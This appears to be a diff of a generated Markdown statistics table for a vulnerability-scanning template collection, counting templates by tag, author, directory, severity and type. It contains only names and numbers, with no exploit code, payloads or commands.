1 | | | | | | | | | -| fabrikar | 1 | | | | | | | | | -| bitrise | 1 | | | | | | | | | -| iclock | 1 | | | | | | | | | -| sucuri | 1 | | | | | | | | | -| simple-file-list | 1 | | | | | | | | | -| katz | 1 | | | | | | | | | -| yiiframework | 1 | | | | | | | | | -| kubeconfig | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| wordpress-country-selector | 1 | | | | | | | | | -| pretty_url_project | 1 | | | | | | | | | -| vcloud | 1 | | | | | | | | | -| martech | 1 | | | | | | | | | -| parler-archived-posts | 1 | | | | | | | | | -| inglorion | 1 | | | | | | | | | -| urls | 1 | | | | | | | | | -| appserv_open_project | 1 | | | | | | | | | -| fractalia | 1 | | | | | | | | | -| shareaholic | 1 | | | | | | | | | -| systeminformation | 1 | | | | | | | | | -| sungrow | 1 | | | | | | | | | -| likeshop | 1 | | | | | | | | | -| zendframework | 1 | | | | | | | | | -| fotka | 1 | | | | | | | | | -| weheartit | 1 | | | | | | | | | -| com-property | 1 | | | | | | | | | -| cththemes | 1 | | | | | | | | | -| squirrelly | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| director | 1 | | | | | | | | | -| hugo | 1 | | | | | | | | | -| supervisor | 1 | | | | | | | | | -| xinuos | 1 | | | | | | | | | -| lobsters | 1 | | | | | | | | | -| dasannetworks | 1 | | | | | | | | | -| portrait-archiv-shop | 1 | | | | | | | | | -| scoutwiki | 1 | | | | | | | | | -| biolink | 1 | | | | | | | | | -| codemenschen | 1 | | | | | | | | | -| revslider | 1 | | | | | | | | | -| jc6 | 1 | | | | | | | | | -| jbpm | 1 | | | | | | | | | -| climatejusticerocks-mastodon-instance | 1 | | | | | | | | | -| eap | 1 | | | | | | | | | -| immich | 1 | | | | | | | | | -| pivotal | 1 | | | | | | | | | -| querysol | 1 | | | | | | | | | -| simple_task_managing_system_project | 1 | | | | | | | | | -| jumpcloud | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| hacker-news | 1 | | | | | | | | | -| 1001mem | 1 | | | | | | | | | -| appveyor | 1 | | | | | | | | | -| mintme | 1 | | | | | | | | | -| wp-upg | 1 | | | | | | | | | -| citybook | 1 | | | | | | | | | -| reputeinfosystems | 1 | | | | | | | | | -| kanev | 1 | | | | | | | | | -| arris | 1 | | | | | | | | | -| mms.pipp | 1 | | | | | | | | | -| revoked | 1 | | | | | | | | | -| mcvie | 1 | | | | | | | | | -| eleanor | 1 | | | | | | | | | -| polls-widget | 1 | | | | | | | | | -| iframe | 1 | | | | | | | | | -| xhamster | 1 | | | | | | | | | -| wisegiga | 1 | | | | | | | | | -| ubuntu | 1 | | | | | | | | | -| scanii | 1 | | | | | | | | | -| wiren | 1 | | | | | | | | | -| public | 1 | | | | | | | | | -| keystone | 1 | | | | | | | | | -| introspection | 1 | | | | | | | | | -| navicat | 1 | | | | | | | | | -| opennebula | 1 | | | | | | | | | -| digiprove | 1 | | | | | | | | | -| bonita | 1 | | | | | | | | | -| duckduckgo | 1 | | | | | | | | | -| atechmedia | 1 | | | | | | | | | -| faust | 1 | | | | | | | | | -| ait-pro | 1 | | | | | | | | | -| paramountplus | 1 | | | | | | | | | -| spiceworks | 1 | | | | | | | | | -| ez | 1 | | | | | | | | | -| ecsimagingpacs | 1 | | | | | | | | | -| joomlaserviceprovider | 1 | | | | | | | | | -| laborator | 1 | | | | | | | | | -| bangresto_project | 1 | | | | | | | | | -| proofpoint | 1 | | | | | | | | | -| imgbb | 1 | | | | | | | | | -| livemasterru | 1 | | | | | | | | | -| audiocode | 1 | | | | | | | | | -| templateinvaders | 1 | | | | | | | | | -| tufin | 1 | | | | | | | | | -| optimizingmatters | 1 | | | | | | | | | -| showcase | 1 | | | | | | | | | -| twitcasting | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| backpack | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| casemanager | 1 | | | | | | | | | -| tbkvision | 1 | | | | | | | | | -| svg | 1 | | | | | | | | | -| policja2009 | 1 | | | | | | | | | -| ilch | 1 | | | | | | | | | -| drive | 1 | | | | | | | | | -| freelancetoindia | 1 | | | | | | | | | -| documentcloud | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| mod-proxy | 1 | | | | | | | | | -| justwriting_project | 1 | | | | | | | | | -| todoist | 1 | | | | | | | | | -| tekton | 1 | | | | | | | | | -| pahtool | 1 | | | | | | | | | -| supportcandy | 1 | | | | | | | | | -| art_gallery_management_system_project | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| wpmanageninja | 1 | | | | | | | | | -| dapp | 1 | | | | | | | | | -| treexml | 1 | | | | | | | | | -| webpconverter | 1 | | | | | | | | | -| simple-link-directory | 1 | | | | | | | | | -| imagefap | 1 | | | | | | | | | -| kasm | 1 | | | | | | | | | -| webviewer | 1 | | | | | | | | | -| business | 1 | | | | | | | | | -| deeplink | 1 | | | | | | | | | -| nj2000 | 1 | | | | | | | | | -| okru | 1 | | | | | | | | | -| sensu | 1 | | | | | | | | | -| vlc-media | 1 | | | | | | | | | -| moxfield | 1 | | | | | | | | | -| redlion | 1 | | | | | | | | | -| www-xml-sitemap-generator-org | 1 | | | | | | | | | -| rubedo_project | 1 | | | | | | | | | -| wildcard | 1 | | | | | | | | | -| hydra | 1 | | | | | | | | | -| discusssocial-mastodon-instance | 1 | | | | | | | | | -| slackholes | 1 | | | | | | | | | -| pcdn | 1 | | | | | | | | | -| patreon-connect | 1 | | | | | | | | | -| domaincheckplugin | 1 | | | | | | | | | -| nevma | 1 | | | | | | | | | -| bricks | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| surreal | 1 | | | | | | | | | -| ipdata | 1 | | | | | | | | | -| 'updraftplus' | 1 | | | | | | | | | -| fcv | 1 | | | | | | | | | -| bsphp | 1 | | | | | | | | | -| orbys | 1 | | | | | | | | | -| sukebeinyaasi | 1 | | | | | | | | | -| toyhouse | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| bouqueteditor_project | 1 | | | | | | | | | -| tengine | 1 | | | | | | | | | -| requests-baskets | 1 | | | | | | | | | -| plusnet | 1 | | | | | | | | | -| gitee | 1 | | | | | | | | | -| mymfans | 1 | | | | | | | | | -| suzuri | 1 | | | | | | | | | -| evilginx | 1 | | | | | | | | | -| pingdom | 1 | | | | | | | | | -| jspx | 1 | | | | | | | | | -| mappress | 1 | | | | | | | | | -| hd-network_real-time_monitoring_system_project | 1 | | | | | | | | | -| concrete5 | 1 | | | | | | | | | -| harmony | 1 | | | | | | | | | -| oecms_project | 1 | | | | | | | | | -| amentotech | 1 | | | | | | | | | -| nopcommerce | 1 | | | | | | | | | -| ticket-master | 1 | | | | | | | | | -| smartsheet | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| oembed | 1 | | | | | | | | | -| realtyna | 1 | | | | | | | | | -| idera | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| clipbucket | 1 | | | | | | | | | -| blogmarks | 1 | | | | | | | | | -| soloby | 1 | | | | | | | | | -| piratebay | 1 | | | | | | | | | -| rumbleuser | 1 | | | | | | | | | -| clickjacking | 1 | | | | | | | | | -| joommasters | 1 | | | | | | | | | -| label-studio | 1 | | | | | | | | | -| avatier | 1 | | | | | | | | | -| kiteworks | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| surveysparrow | 1 | | | | | | | | | -| tagdiv | 1 | | | | | | | | | -| amt | 1 | | | | | | | | | -| locust | 1 | | | | | | | | | -| artbreeder | 1 | | | | | | | | | -| scrapingdog | 1 | | | | | | | | | -| secgate | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| mapstodonspace-mastodon-instance | 1 | | | | | | | | | -| wpovernight | 1 | | | | | | | | | -| scratch | 1 | | | | | | | | | -| lokalise | 1 | | | | | | | | | -| Blogengine | 1 | | | | | | | | | -| statistics | 1 | | | | | | | | | -| julia | 1 | | | | | | | | | -| cph2 | 1 | | | | | | | | | -| rconfig.exposure | 1 | | | | | | | | | -| vernemq | 1 | | | | | | | | | -| opensource | 1 | | | | | | | | | -| kongregate | 1 | | | | | | | | | -| speakout\!_email_petitions_project | 1 | | | | | | | | | -| dvdfab | 1 | | | | | | | | | -| wbcecms | 1 | | | | | | | | | -| pretty-url | 1 | | | | | | | | | -| filmweb | 1 | | | | | | | | | -| analytify | 1 | | | | | | | | | -| mismatched | 1 | | | | | | | | | -| schools_alert_management_script_project | 1 | | | | | | | | | -| fooplugins | 1 | | | | | | | | | -| qmail | 1 | | | | | | | | | -| reblogme | 1 | | | | | | | | | -| psql | 1 | | | | | | | | | -| orbintelligence | 1 | | | | | | | | | -| sri | 1 | | | | | | | | | -| tunefind | 1 | | | | | | | | | -| vsftpd_project | 1 | | | | | | | | | -| sslvpn | 1 | | | | | | | | | -| wd | 1 | | | | | | | | | -| wattpad | 1 | | | | | | | | | -| zeta-producer | 1 | | | | | | | | | -| garmin-connect | 1 | | | | | | | | | -| sexworker | 1 | | | | | | | | | -| dixell | 1 | | | | | | | | | -| helloprint | 1 | | | | | | | | | -| new-year-firework_project | 1 | | | | | | | | | -| fsecure | 1 | | | | | | | | | -| smartbear | 1 | | | | | | | | | -| nitely | 1 | | | | | | | | | -| alltube_project | 1 | | | | | | | | | -| hotel | 1 | | | | | | | | | -| udemy | 1 | | | | | | | | | -| vmstio-mastodon-instance | 1 | | | | | | | | | -| cyberoamworks | 1 | | | | | | | | | -| blocksera | 1 | | | | | | | | | -| bws-htaccess | 1 | | | | | | | | | -| collegemanagement | 1 | | | | | | | | | -| telaen | 1 | | | | | | | | | -| autoset | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| sslmate | 1 | | | | | | | | | -| zentao | 1 | | | | | | | | | -| webport | 1 | | | | | | | | | -| cmsimple | 1 | | | | | | | | | -| stats | 1 | | | | | | | | | -| campaignmonitor | 1 | | | | | | | | | -| sofneta | 1 | | | | | | | | | -| bws-updater | 1 | | | | | | | | | -| pornhub-users | 1 | | | | | | | | | -| zzzphp | 1 | | | | | | | | | -| ucs | 1 | | | | | | | | | -| openpagerank | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| indegy | 1 | | | | | | | | | -| html2pdf | 1 | | | | | | | | | -| foliovision | 1 | | | | | | | | | -| hikivision | 1 | | | | | | | | | -| wp_live_chat_shoutbox_project | 1 | | | | | | | | | -| neobox | 1 | | | | | | | | | -| mikoviny | 1 | | | | | | | | | -| angularjs | 1 | | | | | | | | | -| seber | 1 | | | | | | | | | -| ab_google_map_travel_project | 1 | | | | | | | | | -| maestro | 1 | | | | | | | | | -| matbao | 1 | | | | | | | | | -| csrfguard | 1 | | | | | | | | | -| choom | 1 | | | | | | | | | -| ansi_up_project | 1 | | | | | | | | | -| chopslider | 1 | | | | | | | | | -| acf_to_rest_api_project | 1 | | | | | | | | | -| mini_httpd | 1 | | | | | | | | | -| nsq | 1 | | | | | | | | | -| idangero | 1 | | | | | | | | | -| xenforo | 1 | | | | | | | | | -| patientslikeme | 1 | | | | | | | | | -| hivequeue | 1 | | | | | | | | | -| memrise | 1 | | | | | | | | | -| trino | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| ctolog | 1 | | | | | | | | | -| taringa | 1 | | | | | | | | | -| mailhog | 1 | | | | | | | | | -| racksnet | 1 | | | | | | | | | -| three | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| +| cve | 2396 | dhiyaneshdk | 1233 | http | 7267 | info | 3605 | file | 337 | +| panel | 1105 | daffainfo | 864 | file | 337 | high | 1601 | dns | 24 | +| wordpress | 958 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | | +| exposure | 894 | pikpikcu | 353 | network | 133 | critical | 967 | | | +| xss | 893 | pussycat0x | 328 | code | 80 | low | 257 | | | +| wp-plugin | 833 | ritikchaddha | 313 | javascript | 42 | unknown | 35 | | | +| osint | 799 | pdteam | 285 | ssl | 28 | | | | | +| tech | 667 | ricardomaia | 232 | dns | 21 | | | | | +| lfi | 640 | geeknik | 227 | headless | 11 | | | | | +| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | | +| misconfig | 595 | r3y3r53 | 200 | TEMPLATES-STATS.json | 1 | | | | | +| rce | 573 | 0x_akoko | 179 | cves.json | 1 | | | | | +| packetstorm | 523 | princechaddha | 165 | contributors.json | 1 | | | | | +| cve2021 | 488 | gy741 | 158 | | | | | | | +| wpscan | 486 | rxerium | 138 | | | | | | | +| cve2022 | 469 | sleepingbag945 | 132 | | | | | | | +| wp | 408 | arafatansari | 119 | | | | | | | +| unauth | 357 | tess | 109 | | | | | | | +| file | 346 | righettod | 105 | | | | | | | +| cve2023 | 342 | pdresearch | 73 | | | | | | | +| authenticated | 333 | madrobot | 65 | | | | | | | +| sqli | 329 | zzeitlin | 64 | | | | | | | +| intrusive | 291 | idealphase | 63 | | | | | | | +| kev | 270 | iamnoooob | 61 | | | | | | | +| cve2020 | 257 | akincibor | 59 | | | | | | | +| token-spray | 243 | for3stco1d | 55 | | | | | | | +| login | 234 | rootxharsh | 54 | | | | | | | +| detect | 226 | philippedelteil | 48 | | | | | | | +| config | 217 | gaurang | 42 | | | | | | | +| top-200 | 215 | edoardottt | 41 | | | | | | | +| osint-social | 210 | johnk3r | 39 | | | | | | | +| oast | 209 | c-sh0 | 35 | | | | | | | +| default-login | 201 | j4vaovo | 34 | | | | | | | +| token | 193 | luisfelipe146 | 31 | | | | | | | +| | 191 | adam crosser | 31 | | | | | | | +| apache | 178 | ice3man | 28 | | | | | | | +| network | 174 | pwnhxl | 25 | | | | | | | +| iot | 166 | organiccrap | 24 | | | | | | | +| cve2019 | 163 | hardik-solanki | 24 | | | | | | | +| cve2018 | 161 | ctflearner | 23 | | | | | | | +| keys | 155 | harsh | 23 | | | | | | | +| joomla | 146 | techbrunchfr | 23 | | | | | | | +| malware | 141 | mastercho | 22 | | | | | | | +| redirect | 132 | ffffffff0x | 22 | | | | | | | +| auth-bypass | 123 | sullo | 18 | | | | | | | +| phishing | 117 | parthmalhotra | 18 | | | | | | | +| ssrf | 114 | cckuailong | 18 | | | | | | | +| files | 112 | 0xpugazh | 16 | | | | | | | +| cve2010 | 112 | shaikhyaser | 16 | | | | | | | +| cve2017 | 110 | lu4nx | 16 | | | | | | | +| router | 107 | random-robbie | 16 | | | | | | | +| cms | 107 | unapibageek | 15 | | | | | | | +| install | 105 | pr3r00t | 15 | | | | | | | +| top-100 | 100 | sheikhrishad | 15 | | | | | | | +| devops | 87 | r3dg33k | 14 | | | | | | | +| disclosure | 87 | tenbird | 14 | | | | | | | +| linux | 82 | milo2012 | 14 | | | | | | | +| code | 80 | bhutch | 14 | | | | | | | +| local | 79 | dogasantos | 14 | | | | | | | +| privesc | 79 | elsfa7110 | 13 | | | | | | | +| tokens | 78 | sharath | 13 | | | | | | | +| seclists | 77 | 0ri2n | 13 | | | | | | | +| takeover | 74 | nullfuzz | 13 | | | | | | | +| fileupload | 71 | melbadry9 | 13 | | | | | | | +| oracle | 70 | theabhinavgaur | 13 | | | | | | | +| oss | 67 | meme-lord | 12 | | | | | | | +| cisco | 65 | suman_kar | 12 | | | | | | | +| adobe | 61 | wdahlenb | 11 | | | | | | | +| huntr | 59 | cyllective | 11 | | | | | | | +| cve2015 | 58 | kazet | 11 | | | | | | | +| cve2016 | 56 | co5mos | 10 | | | | | | | +| atlassian | 56 | alph4byt3 | 10 | | | | | | | +| ir | 56 | hackergautam | 10 | | | | | | | +| google | 56 | logicalhunter | 10 | | | | | | | +| vmware | 54 | nadino | 10 | | | | | | | +| enum | 51 | 0x240x23elu | 10 | | | | | | | +| c2 | 50 | random_robbie | 10 | | | | | | | +| logs | 49 | adamcrosser | 9 | | | | | | | +| js | 48 | initstring | 9 | | | | | | | +| tenable | 47 | fabaff | 9 | | | | | | | +| log4j | 46 | oppsec | 9 | | | | | | | +| hackerone | 45 | momika233 | 9 | | | | | | | +| aem | 45 | olearycrew | 9 | | | | | | | +| debug | 45 | emadshanab | 9 | | | | | | | +| osint-gaming | 45 | zh | 8 | | | | | | | +| cve2014 | 44 | aashiq | 8 | | | | | | | +| aws | 44 | iamthefrogy | 8 | | | | | | | +| jndi | 44 | irshad ahamed | 8 | | | | | | | +| vulhub | 44 | veshraj | 8 | | | | | | | +| cloud | 43 | _0xf4n9x_ | 8 | | | | | | | +| plugin | 42 | that_juan_ | 8 | | | | | | | +| osint-porn | 42 | noraj | 8 | | | | | | | +| osint-hobby | 42 | divya_mudgal | 7 | | | | | | | +| deserialization | 42 | amit-jd | 7 | | | | | | | +| traversal | 42 | randomstr1ng | 7 | | | | | | | +| generic | 42 | tarunkoyalwar | 7 | | | | | | | +| springboot | 41 | harshbothra_ | 7 | | | | | | | +| php | 41 | its0x08 | 7 | | | | | | | +| oa | 41 | leovalcante | 7 | | | | | | | +| cnvd | 39 | kophjager007 | 7 | | | | | | | +| misc | 38 | dr_set | 7 | | | | | | | +| listing | 37 | nodauf | 7 | | | | | | | +| jira | 37 | techryptic (@tech) | 7 | | | | | | | +| kubernetes | 37 | huta0 | 7 | | | | | | | +| microsoft | 37 | caspergn | 7 | | | | | | | +| injection | 36 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| osint-misc | 35 | devang-solanki | 6 | | | | | | | +| ibm | 35 | justaacat | 6 | | | | | | | +| miscellaneous | 32 | clem9669 | 6 | | | | | | | +| sap | 32 | xelkomy | 6 | | | | | | | +| cti | 32 | __fazal | 6 | | | | | | | +| osint-tech | 31 | byt3bl33d3r | 6 | | | | | | | +| fuzz | 31 | ja1sh | 6 | | | | | | | +| cve2024 | 30 | gitlab red team | 6 | | | | | | | +| osint-coding | 30 | imnightmaree | 6 | | | | | | | +| tls | 28 | megamansec | 6 | | | | | | | +| wp-theme | 28 | evan rubinstein | 6 | | | | | | | +| k8s | 28 | praetorian-thendrickson | 6 | | | | | | | +| gitlab | 28 | puzzlepeaches | 6 | | | | | | | +| ssl | 28 | forgedhallpass | 6 | | | | | | | +| api | 27 | pathtaga | 6 | | | | | | | +| bestwebsoft | 27 | pentest_swissky | 6 | | | | | | | +| amazon | 27 | hahwul | 6 | | | | | | | +| dlink | 27 | lucky0x0d | 5 | | | | | | | +| fortinet | 26 | mr-xn | 5 | | | | | | | +| ssh | 26 | gtrrnr | 5 | | | | | | | +| weaver | 25 | ganofins | 5 | | | | | | | +| manageengine | 25 | andreluna | 5 | | | | | | | +| proxy | 25 | robotshell | 5 | | | | | | | +| firewall | 25 | r3naissance | 5 | | | | | | | +| cve2012 | 25 | shine | 5 | | | | | | | +| osint-business | 24 | yanyun | 5 | | | | | | | +| osint-finance | 24 | kh4sh3i | 5 | | | | | | | +| osint-shopping | 24 | defr0ggy | 5 | | | | | | | +| admin | 24 | joanbono | 5 | | | | | | | +| zoho | 24 | s0obi | 5 | | | | | | | +| osint-images | 24 | powerexploit | 5 | | | | | | | +| audit | 23 | podalirius | 5 | | | | | | | +| lfr | 23 | prajiteshsingh | 5 | | | | | | | +| file-upload | 23 | vicrack | 5 | | | | | | | +| tomcat | 23 | panch0r3d | 5 | | | | | | | +| stored-xss | 23 | arm!tage | 5 | | | | | | | +| dns | 23 | your3cho | 5 | | | | | | | +| yonyou | 23 | r12w4n | 5 | | | | | | | +| xxe | 22 | cookiehanhoan | 4 | | | | | | | +| cicd | 22 | k0pak4 | 4 | | | | | | | +| citrix | 21 | 3th1c_yuk1 | 4 | | | | | | | +| github | 21 | h1ei1 | 4 | | | | | | | +| weblogic | 21 | heeress | 4 | | | | | | | +| ecology | 21 | nybble04 | 4 | | | | | | | +| printer | 21 | incogbyte | 4 | | | | | | | +| msf | 21 | tanq16 | 4 | | | | | | | +| jenkins | 20 | scent2d | 4 | | | | | | | +| camera | 20 | wisnupramoedya | 4 | | | | | | | +| wavlink | 19 | king-alexander | 4 | | | | | | | +| grafana | 19 | jpg0mez | 4 | | | | | | | +| ftp | 19 | xxcdd | 4 | | | | | | | +| struts | 19 | 0xr2r | 4 | | | | | | | +| rukovoditel | 19 | dadevel | 4 | | | | | | | +| hp | 19 | ice3man543 | 4 | | | | | | | +| cve2011 | 18 | lum8rjack | 4 | | | | | | | +| prestashop | 18 | e_schultze_ | 4 | | | | | | | +| osint-music | 18 | shankar acharya | 4 | | | | | | | +| coldfusion | 18 | dolev farhi | 4 | | | | | | | +| android | 18 | ggranjus | 4 | | | | | | | +| ruijie | 18 | flx | 3 | | | | | | | +| service | 17 | imjust0 | 3 | | | | | | | +| azure | 17 | xianke | 3 | | | | | | | +| node.js | 17 | z3bd | 3 | | | | | | | +| nginx | 17 | j3ssie | 3 | | | | | | | +| confluence | 17 | iamnooob | 3 | | | | | | | +| cve2009 | 16 | davidmckennirey | 3 | | | | | | | +| jarm | 16 | johnjhacking | 3 | | | | | | | +| rconfig | 16 | taielab | 3 | | | | | | | +| backup | 16 | fxploit | 3 | | | | | | | +| alibaba | 16 | whoever | 3 | | | | | | | +| osint-blog | 16 | binaryfigments | 3 | | | | | | | +| mail | 16 | huowuzhao | 3 | | | | | | | +| microweber | 16 | f1tz | 3 | | | | | | | +| status | 16 | me9187 | 3 | | | | | | | +| honeypot | 16 | lucasljm2001 | 3 | | | | | | | +| woocommerce | 15 | cheesymoon | 3 | | | | | | | +| cve2008 | 15 | unstabl3 | 3 | | | | | | | +| nodejs | 15 | ambassify | 3 | | | | | | | +| magento | 15 | farish | 3 | | | | | | | +| vpn | 15 | alifathi-h1 | 3 | | | | | | | +| tongda | 15 | andydoering | 3 | | | | | | | +| java | 15 | emenalf | 3 | | | | | | | +| cnvd2021 | 15 | thomas_from_offensity | 3 | | | | | | | +| cve2013 | 15 | fyoorer | 3 | | | | | | | +| seeyon | 15 | 0w4ys | 3 | | | | | | | +| zyxel | 15 | e1a | 3 | | | | | | | +| bypass | 15 | lark-lab | 3 | | | | | | | +| smb | 14 | ph33r | 3 | | | | | | | +| icewarp | 14 | yash anand @yashanand155 | 3 | | | | | | | +| creds-stuffing | 14 | skeltavik | 3 | | | | | | | +| backdoor | 14 | swissky | 3 | | | | | | | +| ruby | 14 | arcc | 3 | | | | | | | +| jboss | 14 | canberbamber | 3 | | | | | | | +| dell | 14 | coldfish | 3 | | | | | | | +| docker | 14 | aringo | 3 | | | | | | | +| osint-art | 14 | jarijaas | 3 | | | | | | | +| node | 14 | yuzhe-zhang-0 | 3 | | | | | | | +| npm | 14 | true13 | 3 | | | | | | | +| login-check | 14 | pulsesecurity.co.nz | 3 | | | | | | | +| smtp | 14 | evergreencartoons | 3 | | | | | | | +| zohocorp | 14 | vsh00t | 3 | | | | | | | +| domainmod | 14 | randomrobbie | 3 | | | | | | | +| redis | 14 | splint3r7 | 3 | | | | | | | +| osint-health | 14 | badboycxcc | 3 | | | | | | | +| dashboard | 14 | mavericknerd | 3 | | | | | | | +| auth | 14 | bernardofsr | 3 | | | | | | | +| graphql | 13 | atomiczsec | 3 | | | | | | | +| osint-dating | 13 | dudez | 3 | | | | | | | +| netgear | 13 | sushantkamble | 3 | | | | | | | +| laravel | 13 | _generic_human_ | 3 | | | | | | | +| cuppacms | 13 | impramodsargar | 3 | | | | | | | +| rails | 13 | m4lwhere | 3 | | | | | | | +| osint-political | 13 | matt galligan | 3 | | | | | | | +| git | 13 | isacaya | 3 | | | | | | | +| fortigate | 13 | ekrause | 3 | | | | | | | +| cuppa | 13 | parth | 3 | | | | | | | +| abstractapi | 13 | shifacyclewala | 3 | | | | | | | +| windows | 13 | vagnerd | 3 | | | | | | | +| airflow | 13 | dr0pd34d | 3 | | | | | | | +| sonicwall | 13 | thevillagehacker | 2 | | | | | | | +| setup | 13 | sy3omda | 2 | | | | | | | +| moosocial | 12 | usdag | 2 | | | | | | | +| headless | 12 | dheerajmadhukar | 2 | | | | | | | +| netsweeper | 12 | bmcel | 2 | | | | | | | +| ofbiz | 12 | cocxanh | 2 | | | | | | | +| kafka | 12 | d4vy | 2 | | | | | | | +| doppler | 12 | n-thumann | 2 | | | | | | | +| zimbra | 12 | 0xrudra | 2 | | | | | | | +| ssti | 12 | ree4pwn | 2 | | | | | | | +| ivanti | 12 | thardt-praetorian | 2 | | | | | | | +| webserver | 12 | afaq | 2 | | | | | | | +| mysql | 12 | kre80r | 2 | | | | | | | +| newrelic | 12 | moritz nentwig | 2 | | | | | | | +| drupal | 12 | ehsahil | 2 | | | | | | | +| phpmyadmin | 11 | codexlynx | 2 | | | | | | | +| fastjson | 11 | v0idc0de | 2 | | | | | | | +| online-fire-reporting | 11 | github.com/its0x08 | 2 | | | | | | | +| osint-video | 11 | thabisocn | 2 | | | | | | | +| xstream | 11 | brucelsone | 2 | | | | | | | +| iis | 11 | manas_harsh | 2 | | | | | | | +| phpgurukul | 11 | x1m_martijn | 2 | | | | | | | +| jetbrains | 11 | myztique | 2 | | | | | | | +| spring | 11 | danielmofer | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | mohammedsaneem | 2 | | | | | | | +| vbulletin | 11 | kishore-hariram | 2 | | | | | | | +| jolokia | 11 | joshlarsen | 2 | | | | | | | +| prometheus | 10 | ajaysenr | 2 | | | | | | | +| zabbix | 10 | 0xnirvana | 2 | | | | | | | +| solr | 10 | 8arthur | 2 | | | | | | | +| glpi | 10 | mzack9999 | 2 | | | | | | | +| db | 10 | parzival | 2 | | | | | | | +| cache | 10 | c3l3si4n | 2 | | | | | | | +| info-leak | 10 | supras | 2 | | | | | | | +| xstream_project | 10 | koti2 | 2 | | | | | | | +| thinkphp | 10 | k11h-de | 2 | | | | | | | +| solarview | 10 | z0ne | 2 | | | | | | | +| symfony | 10 | clarkvoss | 2 | | | | | | | +| elasticsearch | 10 | w4cky_ | 2 | | | | | | | +| nagios | 10 | sbani | 2 | | | | | | | +| sitecore | 10 | randomdhiraj | 2 | | | | | | | +| dedecms | 10 | streetofhackerr007 | 2 | | | | | | | +| installer | 10 | kiblyn11 | 2 | | | | | | | +| dropbox | 10 | vavkamil | 2 | | | | | | | +| hikvision | 10 | cckuakilong | 2 | | | | | | | +| django | 10 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| digitalocean | 10 | 6mile | 2 | | | | | | | +| moodle | 9 | y4er | 2 | | | | | | | +| versa | 9 | luci | 2 | | | | | | | +| druid | 9 | nuk3s3c | 2 | | | | | | | +| opencats | 9 | hackerarpan | 2 | | | | | | | +| scada | 9 | foulenzer | 2 | | | | | | | +| vcenter | 9 | h0j3n | 2 | | | | | | | +| sangfor | 9 | christianpoeschl | 2 | | | | | | | +| kube | 9 | shelled | 2 | | | | | | | +| bitbucket | 9 | davidegirardi | 2 | | | | | | | +| exchange | 9 | thezakman | 2 | | | | | | | +| gitea | 9 | charles d. | 2 | | | | | | | +| wso2 | 9 | herry | 2 | | | | | | | +| instrusive | 9 | nvn1729 | 2 | | | | | | | +| secret | 9 | danmcinerney | 2 | | | | | | | +| facebook | 9 | sascha brendel | 2 | | | | | | | +| cnvd2020 | 9 | mrharshvardhan | 2 | | | | | | | +| hashicorp | 9 | notnotnotveg | 2 | | | | | | | +| pfsense | 9 | maximus decimus | 2 | | | | | | | +| python | 9 | 0xsapra | 2 | | | | | | | +| lucee | 9 | nkxxkn | 2 | | | | | | | +| firebase | 9 | bsysop | 2 | | | | | | | +| artica | 9 | gal nagli | 2 | | | | | | | +| osint-news | 8 | raesene | 2 | | | | | | | +| spotweb | 8 | zomsop82 | 2 | | | | | | | +| phpjabbers | 8 | 0xcrypto | 2 | | | | | | | +| emerge | 8 | dogancanbakir | 2 | | | | | | | +| console | 8 | bing0o | 2 | | | | | | | +| config-audit | 8 | hetroublemakr | 2 | | | | | | | +| bucket | 8 | bp0lr | 2 | | | | | | | +| cisco-switch | 8 | salts | 2 | | | | | | | +| go | 8 | paradessia | 2 | | | | | | | +| cloud-enum | 8 | brenocss | 2 | | | | | | | +| mlflow | 8 | g4l1t0 | 2 | | | | | | | +| symantec | 8 | 0xelkomy | 2 | | | | | | | +| recon | 8 | zy9ard3 | 2 | | | | | | | +| oauth | 8 | uomogrande | 2 | | | | | | | +| dahua | 8 | pxmme1337 | 2 | | | | | | | +| crlf | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| manager | 8 | israel comazzetto dos reis | 2 | | | | | | | +| unauthenticated | 8 | shankaracharya | 2 | | | | | | | +| default-page | 8 | lotusdll | 2 | | | | | | | +| sophos | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| metadata | 8 | arliya | 2 | | | | | | | +| elastic | 8 | dbrwsky | 2 | | | | | | | +| e-office | 8 | wa1tf0rme | 2 | | | | | | | +| atom | 8 | amsda | 2 | | | | | | | +| hms | 8 | udit_thakkur | 2 | | | | | | | +| phpinfo | 8 | rafaelwdornelas | 2 | | | | | | | +| wanhu | 8 | liwermor | 2 | | | | | | | +| ognl | 8 | geekby | 2 | | | | | | | +| discord | 8 | martincodes-de | 2 | | | | | | | +| samsung | 8 | florianmaak | 2 | | | | | | | +| huawei | 8 | gevakun | 2 | | | | | | | +| mirai | 8 | joshua rogers | 2 | | | | | | | +| car_rental_management_system_project | 7 | ayadim | 2 | | | | | | | +| fortios | 7 | korteke | 2 | | | | | | | +| activemq | 7 | msegoviag | 2 | | | | | | | +| blind | 7 | convisoappsec | 2 | | | | | | | +| pmb | 7 | redteambrasil | 2 | | | | | | | +| mobileiron | 7 | 666asd | 2 | | | | | | | +| progress | 7 | paperpen | 2 | | | | | | | +| slack | 7 | supr4s | 2 | | | | | | 